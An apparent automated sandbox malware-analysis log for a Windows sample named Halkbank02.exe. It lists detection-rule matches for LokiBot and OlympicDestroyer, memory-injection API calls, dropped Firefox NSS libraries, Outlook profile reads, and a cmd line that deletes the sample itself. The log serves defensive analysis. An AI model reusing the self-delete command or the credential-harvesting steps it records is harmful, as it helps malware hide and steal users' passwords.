      Source: Halkbank02.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 28.2.Halkbank02.exe.1fcb3556.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004015001_2_00401500
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004028721_2_00402872
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402C7A1_2_00402C7A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402A0C1_2_00402A0C
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402C3F1_2_00402C3F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004028F71_2_004028F7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402A811_2_00402A81
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004020A71_2_004020A7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004015501_2_00401550
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402B021_2_00402B02
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004027DC1_2_004027DC
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402B841_2_00402B84
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_0040298D1_2_0040298D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A0E151_2_022A0E15
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA2B91_2_022AA2B9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A08DF1_2_022A08DF
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A614D1_2_022A614D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A65A41_2_022A65A4
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A11E11_2_022A11E1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A122A1_2_022A122A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A022B1_2_022A022B
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A20241_2_022A2024
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4E251_2_022A4E25
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A060B1_2_022A060B
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA00E1_2_022AA00E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A146E1_2_022A146E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A36731_2_022A3673
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A0A461_2_022A0A46
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A1C461_2_022A1C46
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A84521_2_022A8452
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A28501_2_022A2850
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A18AE1_2_022A18AE
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4AA31_2_022A4AA3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9AA01_2_022A9AA0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A38A11_2_022A38A1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A46B61_2_022A46B6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A248A1_2_022A248A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8E8E1_2_022A8E8E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A628F1_2_022A628F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A30931_2_022A3093
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A72941_2_022A7294
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A98EA1_2_022A98EA
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A28EB1_2_022A28EB
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8EE01_2_022A8EE0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A90F31_2_022A90F3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A22F61_2_022A22F6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A52C81_2_022A52C8
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA8D91_2_022AA8D9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A50D31_2_022A50D3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AACD71_2_022AACD7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A352D1_2_022A352D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A6F221_2_022A6F22
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A630A1_2_022A630A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9B0D1_2_022A9B0D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A2F1D1_2_022A2F1D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8D6F1_2_022A8D6F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A59631_2_022A5963
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A1B721_2_022A1B72
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A91491_2_022A9149
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A13401_2_022A1340
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A97451_2_022A9745
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8F561_2_022A8F56
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A49831_2_022A4983
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A67811_2_022A6781
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A15921_2_022A1592
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A85E31_2_022A85E3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DF91_2_022A4DF9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A41F01_2_022A41F0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA7C91_2_022AA7C9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A99C21_2_022A99C2
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9DC31_2_022A9DC3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9DC11_2_022A9DC1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A05DF1_2_022A05DF
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A69DD1_2_022A69DD
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A37D21_2_022A37D2
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DD31_2_022A4DD3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A89D61_2_022A89D6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A0E15 NtWriteVirtualMemory,LoadLibraryA,1_2_022A0E15
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA2B9 NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA,1_2_022AA2B9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A65A4 NtWriteVirtualMemory,NtAllocateVirtualMemory,1_2_022A65A4
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A11E1 NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,1_2_022A11E1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA1D8 NtProtectVirtualMemory,1_2_022AA1D8
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A2024 NtWriteVirtualMemory,1_2_022A2024
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA254 NtProtectVirtualMemory,1_2_022AA254
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A52C8 NtWriteVirtualMemory,1_2_022A52C8
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A50D3 NtWriteVirtualMemory,1_2_022A50D3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AACD7 NtWriteVirtualMemory,1_2_022AACD7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A352D NtWriteVirtualMemory,LoadLibraryA,1_2_022A352D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8D6F NtWriteVirtualMemory,1_2_022A8D6F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A5963 NtWriteVirtualMemory,1_2_022A5963
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A6781 NtWriteVirtualMemory,LoadLibraryA,1_2_022A6781
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A85E3 NtWriteVirtualMemory,1_2_022A85E3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DF9 NtWriteVirtualMemory,1_2_022A4DF9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A41F0 NtWriteVirtualMemory,1_2_022A41F0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DD3 NtWriteVirtualMemory,1_2_022A4DD3
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess Stats: CPU usage > 98%
      Source: api-ms-win-core-util-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-private-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l2-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-heap-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-localization-l1-2-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-console-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-math-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-filesystem-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-multibyte-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-time-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-debug-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-environment-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-locale-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-convert-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-conio-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-2-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-libraryloader-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-1.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-errorhandling-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-profile-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processenvironment-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-handle-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-utility-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-string-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-string-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-datetime-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-timezone-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-heap-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-stdio-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-memory-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-sysinfo-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-2-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-interlocked-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-namedpipe-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-process-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-runtime-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: Halkbank02.exe, 00000001.00000000.235179747.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exe, 00000001.00000002.562536410.0000000002180000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemeduse.exeFE2XGeneral court% vs Halkbank02.exe
      Source: Halkbank02.exeBinary or memory string: OriginalFilename vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000000.557120833.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exeBinary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\Halkbank02.exeSection loaded: crtdll.dllJump to behavior
      Source: Halkbank02.exeReversingLabs: Detection: 13%
      Source: Halkbank02.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe' Jump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\Jump to behavior
      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@8/53@2/3
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL id FROM %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
      Source: C:\Users\user\Desktop\Halkbank02.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-F44B36F3-391C74315
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_01
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.28.dr
      Source: Binary string: ucrtbase.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-memory-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874674316.00000000200D4000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-synch-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.28.dr
